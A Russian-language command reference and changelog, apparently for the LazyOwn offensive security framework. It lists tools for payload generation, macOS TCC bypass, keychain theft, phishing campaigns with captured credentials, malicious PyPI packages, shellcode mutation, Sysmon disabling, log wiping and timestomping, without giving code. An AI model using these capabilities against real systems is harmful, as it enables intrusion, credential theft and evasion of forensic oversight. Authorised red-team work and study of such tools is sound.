Генерировать продвинутые полезные нагрузки для Linux (LD_PRELOAD, eBPF, PAM, модуль ядра).

llm_budget

Фаза: не классифицировано | Источник: cli/commands/ai.py

Показать дневной бюджет затрат LLM, лимит токенов на вызов и текущие расходы.

log_tamper

Фаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py

Команды очистки журналов для разных платформ.

macos_keychain

Фаза: не классифицировано | Источник: cli/commands/mobile_macos.py

Извлечь секреты из связки ключей macOS.

macos_payload

Фаза: не классифицировано | Источник: cli/commands/payload_arsenal.py

Генерировать полезные нагрузки для macOS (пакеты .app, закрепление, обход TCC).

macos_persist

Фаза: не классифицировано | Источник: cli/commands/mobile_macos.py

Генерировать закрепление в macOS через LaunchAgent.

macos_tcc

Фаза: не классифицировано | Источник: cli/commands/mobile_macos.py

Генерировать обход TCC (Transparency, Consent, Control) в macOS.

memory_clean

Фаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py

Очистить артефакты памяти — билеты Kerberos, буфер обмена, переменные окружения, учётные данные.

mfa_bypass

Фаза: не классифицировано | Источник: cli/commands/cicd.py

Перечислить и протестировать методы обхода MFA.

mutate_shellcode

Фаза: не классифицировано | Источник: cli/commands/evasive_payload.py

Применить полиморфную мутацию к шеллкоду для обхода сигнатур.

network_opsec

Фаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py

Сетевая OPSEC — цепочки прокси, DoH, обнаружение канареек, анализ трафика.

opsec

Фаза: не классифицировано | Источник: cli/commands/security.py

Оценить риск OPSEC для команды LazyOwn перед выполнением.

opsec_score

Фаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py

Оценка риска OPSEC в реальном времени с контекстным блокированием действий (v2).

orchestrate

Фаза: не классифицировано | Источник: cli/commands/orchestration.py

Направить цель через единый оркестратор и вывести результат.

package_squat

Фаза: не классифицировано | Источник: cli/commands/supply_chain.py

Сгенерировать вредоносный пакет PyPI для путаницы зависимостей.

parquet_query

Фаза: не классифицировано | Источник: cli/commands/mcp_bridge.py

Запросить базы знаний parquet (GTFOBins, LOLBas, ATT&CK, сессии).

pentest_report

Фаза: не классифицировано | Источник: cli/commands/reporting.py

Сгенерировать профессиональный отчёт о пентесте.

phish_report

Фаза: не классифицировано | Источник: cli/commands/phishing_wizard.py

Показать результаты кампании и перехваченные учётные данные.

phish_serve

Фаза: не классифицировано | Источник: cli/commands/phishing_wizard.py

Запустить лёгкий HTTP-сервер для фишинговых целевых страниц.

phish_wizard

Фаза: не классифицировано | Источник: cli/commands/phishing_wizard.py

Интерактивный мастер фишинговой кампании от начала до конца.

pivot_kill

Фаза: не классифицировано | Источник: cli/commands/pivoting.py

Убить все туннели пивота и выполнить очистку.

pivot_proxy

Фаза: не классифицировано | Источник: cli/commands/pivoting.py

Запустить локальный SOCKS-прокси через цепочку пивота.

pivot_scan

Фаза: не классифицировано | Источник: cli/commands/pivoting.py

Сканировать внутренние сети через текущую цепочку пивота.

pivot_status

Фаза: не классифицировано | Источник: cli/commands/pivoting.py

Показать текущее состояние цепочки пивота.

playbook_run

Фаза: не классифицировано | Источник: cli/commands/mcp_bridge.py

Выполнить сгенерированный YAML-плейбук шаг за шагом через оболочку.

polymorphic

Фаза: не классифицировано | Источник: cli/commands/payload_arsenal.py

Применить полиморфную мутацию к шеллкоду.

rag_query

Фаза: не классифицировано | Источник: cli/commands/mcp_bridge.py

Семантический поиск по артефактам сессии (сканы, журналы, заметки).

reload_addons

Фаза: без категории | Источник: cli/commands/audit.py

Повторное сканирование lazyaddons/ и plugins/ на предмет изменений; перезагружает новые элементы.

rotate_aes

Фаза: без категории | Источник: cli/commands/security.py

Сгенерировать новый AES-ключ и перешифровать все запечатанные учетные данные.

route

Фаза: без категории | Источник: lazyown.py

Направлять естественно-языковый запрос к инструменту LazyOwn. Использование: route

saas_enum

Фаза: без категории | Источник: cli/commands/cloud_attacks.py

Перечисление SaaS-платформ — M365, Google Workspace, Salesforce, Slack, ServiceNow.

seal_credentials

Фаза: без категории | Источник: cli/commands/security.py

Зашифровать все чувствительные значения в payload.json с помощью AES-256-GCM.

session_state

Фаза: без категории | Источник: cli/commands/mcp_bridge.py

Псевдоним sitrep, сохранённый для паритета глаголов MCP (lazyown_session_state).

set

Фаза: без категории | Источник: lazyown.py

Установить параметр — единый интерфейс set/assign.

shred

Фаза: без категории | Источник: cli/commands/anti_forensics.py

Безопасно удалять файлы, перезаписывая их перед удалением.

sleep_configure

Фаза: без категории | Источник: cli/commands/sleep_obfuscation.py

Настроить активную технику обфускации сна.

sleep_info

Фаза: без категории | Источник: cli/commands/sleep_obfuscation.py

Показать подробную информацию о технике обфускации сна.

sleep_list

Фаза: без категории | Источник: cli/commands/sleep_obfuscation.py

Список доступных техник обфускации сна.

socks_config

Фаза: без категории | Источник: cli/commands/socks_proxy.py

Показать или настроить SOCKS5-прокси.

socks_export

Фаза: без категории | Источник: cli/commands/socks_proxy.py

Экспорт спецификации SOCKS5-прокси для доставки beacon.

socks_sessions

Фаза: без категории | Источник: cli/commands/socks_proxy.py

Список активных SOCKS-прокси сессий.

staged_delivery

Фаза: без категории | Источник: cli/commands/payload_arsenal.py

Генерация артефактов поэтапной доставки (HTA, VBA, LNK, ISO, VHD).

state_snapshot

Фаза: без категории | Источник: lazyown.py

Показать единый снимок StateManager (БД + JSON-кэши).

status_bar

Фаза: без категории | Источник: cli/commands/orchestration.py

Просмотр, переключение и обновление строки состояния приглашения.

status_tail

Фаза: без категории | Источник: cli/commands/audit.py

Вывод живого прогресса из последних файлов sessions/scan_*.partial.

sysmon_disable

Фаза: без категории | Источник: cli/commands/opsec_cleanup.py

Генерация команд для отключения Windows Sysmon.

threat_model

Фаза: без категории | Источник: cli/commands/mcp_bridge.py

Построение или проверка модели угроз, полученной из событий сессии.

timeline

Фаза: без категории | Источник: cli/commands/mcp_bridge.py

Псевдоним timeline_browser, сохранённый для паритета глаголов MCP (lazyown_timeline).

timestomp

Фаза: без категории | Источник: cli/commands/opsec_cleanup.py

Манипулирование временными метками MACB файлов для обхода судебного анализа временной шкалы.

unseal_credentials

Фаза: без категории | Источник: cli/commands/security.py

Расшифровать запечатанные значения учетных данных в payload.json для проверки.

vuln_list

Фаза: без категории | Источник: cli/commands/reporting.py

Список обнаруженных уязвимостей из базы данных сессий.

wipe_free

Фаза: без категории | Источник: cli/commands/anti_forensics.py

Затирание свободного дискового пространства для предотвращения судебного восстановления файлов.

wipe_logs

Фаза: без категории | Источник: cli/commands/anti_forensics.py

Очистка системных журналов на удаленной цели.

wipe_timeline

Фаза: без категории | Источник: cli/commands/anti_forensics.py

Затирание временных меток файлов и истории оболочки на цели.

Журнал изменений

Прочее

Прочее

* * функция (feat): новая модель мира как источник истины для цепочки атак (kill chain) для запуска отдельных фаз

Версия: release/0.2.160

с любовью к дашбордам маркетплейса, новому графу GUI2, правилам YARA, реализованным правилам Nuclei и т.д.

Изменённые файлы:
- .coverage - AGENTS.md - CLAUDE.md - README.md - cli/command_chain.py - cli/commands/bof_registry.py - cli/commands/c2_profile.py - cli/commands/cred_migrated.py - cli/commands/dns_exfil.py - cli/commands/enum.py - cli/commands/estorides.py - cli/commands/exploit_migrated.py - cli/commands/lateral_migrated.py - cli/commands/misc_migrated.py - cli/commands/persist_migrated.py - cli/commands/postexp_migrated.py - cli/commands/privilege_escalation.py - cli/commands/report.py - cli/commands/report_migrated.py - cli/commands/scan_migrated.py - cli/commands/security.py - cli/commands/sleep_obfuscation.py - cli/commands/socks_proxy.py - cli/dashboard_tui.py - cli/engagement_hooks.py - cli/killchain.py - cli/ops_commands.py - cli/reactive_hints.py - cli/recommendation.py - cli/recommendation_signals.py - cli/tips_engine.py - config.json - fast_run_as_r00t.sh - lazyaddons/blacksandbeacon.yaml - lazyaddons/estorides.yaml - lazyc2.py - lazygui/app.py - lazygui/config/c2_credentials.py - lazygui/config/constants.py - lazygui/config/paths.py - lazygui/config/settings.py - lazygui/panels/init.py - lazygui/panels/campaign_panel.py - lazygui/panels/cve_panel.py - lazygui/panels/graph_panel.py - lazygui/panels/history_panel.py - lazygui/panels/killchain_panel.py - lazygui/panels/marketplace_panel.py - lazygui/panels/registry.py - lazygui/panels/sessions_panel.py - lazygui/panels/terminal_panel.py - lazygui/services/init.py - lazygui/services/backend.py - lazygui/services/models.py - lazygui/services/teamserver_backend.py - lazygui/widgets/init.py - lazygui/widgets/beacon_command_modal.py - lazygui/widgets/graph_view.py - lazygui/widgets/terminal_view.py - lazygui/windows/connect_dialog.py - lazygui/windows/main_window.py - lazyown.py - modules/beacon_config_builder.py - modules/beacon_history.py - modules/bof_registry.py - modules/c2_builder.py - modules/c2_profile_engine.py - modules/conditional_hooks.py - modules/estorides_importer.py - modules/gui.py - modules/kill_chain_viz.py - modules/killchain.py - modules/lazyown_bridge.py - modules/report_templates.py - modules/sessions/llm_budget.json - modules/sleep_obfuscation.py - modules/socks_proxy.py - modules/world_model.py - sessions/implant/implant_crypt.go - sessions/implant/stub.c - sessions/implant/stub_lin.c - sessions/phishing/campaigns/short_urls.json - skills/hermes-lazyown/constants.py - templates/index.html - templates/nav.html - tests/run_mutation_killchain.py - tests/test_beacon_config_builder.py - tests/test_beacon_history.py - tests/test_bof_registry.py - tests/test_c2_profile_engine.py - tests/test_categories.py - tests/test_command_set_migration.py - tests/test_conditional_hooks_extended.py - tests/test_killchain_auto_refresh.py - tests/test_killchain_gap_signal.py - tests/test_killchain_snapshot.py - tests/test_killchain_unified.py - tests/test_killchain_unified_v2.py - tests/test_lazygui_backend.py - tests/test_lazygui_graph_widget.py - tests/test_lazygui_models.py - tests/test_ops_loot_phase.py - tests/test_sleep_obfuscation.py - tests/test_socks_proxy.py - tests/test_world_model_extended.py - users.json - utils.py

Созданные файлы:
- .coverage - cli/commands/bof_registry.py - cli/commands/c2_profile.py - cli/commands/estorides.py - cli/commands/sleep_obfuscation.py - cli/commands/socks_proxy.py - lazygui/config/c2_credentials.py - lazygui/panels/campaign_panel.py - lazygui/panels/cve_panel.py - lazygui/panels/graph_panel.py - lazygui/panels/history_panel.py - lazygui/panels/marketplace_panel.py - lazygui/widgets/beacon_command_modal.py - lazygui/widgets/graph_view.py - modules/beacon_config_builder.py - modules/beacon_history.py - modules/bof_registry.py - modules/c2_profile_engine.py - modules/estorides_importer.py - modules/killchain.py - modules/sleep_obfuscation.py - modules/socks_proxy.py - tests/run_mutation_killchain.py - tests/test_beacon_config_builder.py - tests/test_beacon_history.py - tests/test_bof_registry.py - tests/test_c2_profile_engine.py - tests/test_categories.py - tests/test_conditional_hooks_extended.py - tests/test_killchain_auto_refresh.py - tests/test_killchain_gap_signal.py - tests/test_killchain_snapshot.py - tests/test_killchain_unified.py - tests/test_killchain_unified_v2.py - tests/test_lazygui_backend.py - tests/test_lazygui_graph_widget.py - tests/test_lazygui_models.py - tests/test_sleep_obfuscation.py - tests/test_socks_proxy.py - tests/test_world_model_extended.py

LazyOwn на HackTheBox: https://app.hackthebox.com/teams/overview/6429

LazyOwn/ https://grisuno.github.io/LazyOwn/

Дата: пн 03 авг 2026 00:02:10 -04

Время: 1785729730

Прочее

Прочее

* * команда privesc :D

Прочее

Прочее

* * фаза киллчейна с единым источником правды

Прочее

Прочее

* * фаза киллчейна с единым источником правды

Прочее

Прочее

* * 1. src/page_view.c — пробел между и (текстовый узел, родитель которого //

) выводился как случайный
Войдите, чтобы оставить комментарий